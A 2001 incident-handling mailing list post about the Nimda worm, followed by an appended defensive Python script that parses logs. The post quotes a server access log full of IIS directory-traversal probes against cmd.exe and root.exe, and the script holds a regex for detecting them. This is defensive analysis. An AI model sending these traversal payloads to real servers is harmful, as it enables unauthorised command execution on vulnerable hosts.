Security Incidents mailing list archives
Re: Tracking down the still infected hosts
From: Neil Dickey <neil () geol niu edu>
Date: Tue, 25 Sep 2001 13:58:29 -0500 (CDT)
Tina Bird <tbird () precision-guesswork com> wrote:
Can I ask a question? According to Ryan Russell (who's been analyzing the worm code), Nimda doesn't honor redirects - it just checks the response it gets from a Web server to determine whether or not the server is vulnerable. It doesn't follow redirects. So what does this actually accomplish?
In my experience this is correct. I implemented the redirect this morning (09:00), and just got an extended scan (162 hits) from a source which appeared to be completely unaffected by the new setting. Evidence provided below.

Best regards,

Neil Dickey, Ph.D.
Research Associate/Sysop
Geology Department
Northern Illinois University
DeKalb, Illinois 60115

------------------------------------------------------------------

Here's the line in the configuration file ...

RedirectMatch (.*)\cmd.exe$ http://127.0.0.1

... and here's the log trace:

hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
hs090.fau.edu - - [25/Sep/2001:13:15:22 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:28 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:56 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:56 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
hs090.fau.edu - - [25/Sep/2001:13:15:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
hs090.fau.edu - - [25/Sep/2001:13:16:01 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:01 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:03 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
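The trace above is the evidence for the point of the post: a RedirectMatch answers the cmd.exe probes with 302, yet the scanning host carries on regardless. The following script is an added example, not part of the original message or the mailing list, for a defender who wants to check the same thing in their own Apache access logs: it parses common-log-format lines, picks out the root.exe/cmd.exe probe signatures seen in the trace, tallies per host which status codes the probes drew, and reports whether a host kept probing after its first 302 (which is what "does not honor redirects" looks like in the log). The sample log lines are constructed here after the entries in the post; the IP 192.0.2.10 and the non-probe request are invented control data.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: entries modelled on the trace in the post plus one
# ordinary request from a documentation-range address as a control.
SAMPLE_LOG = """\
hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
hs090.fau.edu - - [25/Sep/2001:13:15:22 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
192.0.2.10 - - [25/Sep/2001:13:20:01 -0500] "GET /index.html HTTP/1.0" 200 1043
"""

# Apache Common Log Format: host ident user [time] "request" status size
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Probe signature: a request whose path component ends in root.exe or cmd.exe,
# whatever directory-traversal encoding precedes it (all variants in the post
# reduce to this).
NIMDA_RE = re.compile(r'/(root\.exe|cmd\.exe)(\?|$)', re.IGNORECASE)


def parse_line(line):
    """Return a dict of CLF fields, or None if the line is not CLF."""
    m = CLF_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def nimda_probes(log_text):
    """Yield parsed entries whose request path matches the probe signature."""
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and NIMDA_RE.search(entry["path"]):
            yield entry


def summarize(log_text):
    """Per host: how many probes arrived and which status codes they drew."""
    hits = defaultdict(Counter)
    for e in nimda_probes(log_text):
        hits[e["host"]][e["status"]] += 1
    return {host: dict(c) for host, c in hits.items()}


def continued_after_redirect(log_text, host):
    """True if `host` sent further probes after its first 302 response,
    i.e. the redirect did not stop the scan (the behaviour the post reports)."""
    seen_302 = False
    for e in nimda_probes(log_text):
        if e["host"] != host:
            continue
        if seen_302:
            return True
        if e["status"] == 302:
            seen_302 = True
    return False


if __name__ == "__main__":
    for host, codes in summarize(SAMPLE_LOG).items():
        verdict = "kept scanning after 302" if continued_after_redirect(SAMPLE_LOG, host) else "stopped at 302"
        print(f"{host}: {sum(codes.values())} probes, status breakdown {codes}, {verdict}")
```

Run it against a real log with `summarize(open("access_log").read())`; a host whose probe count keeps climbing after its first 302 is one the redirect is not deterring, so the useful outcome of the RedirectMatch is the clean 302 marker in the log rather than any reduction in scan traffic.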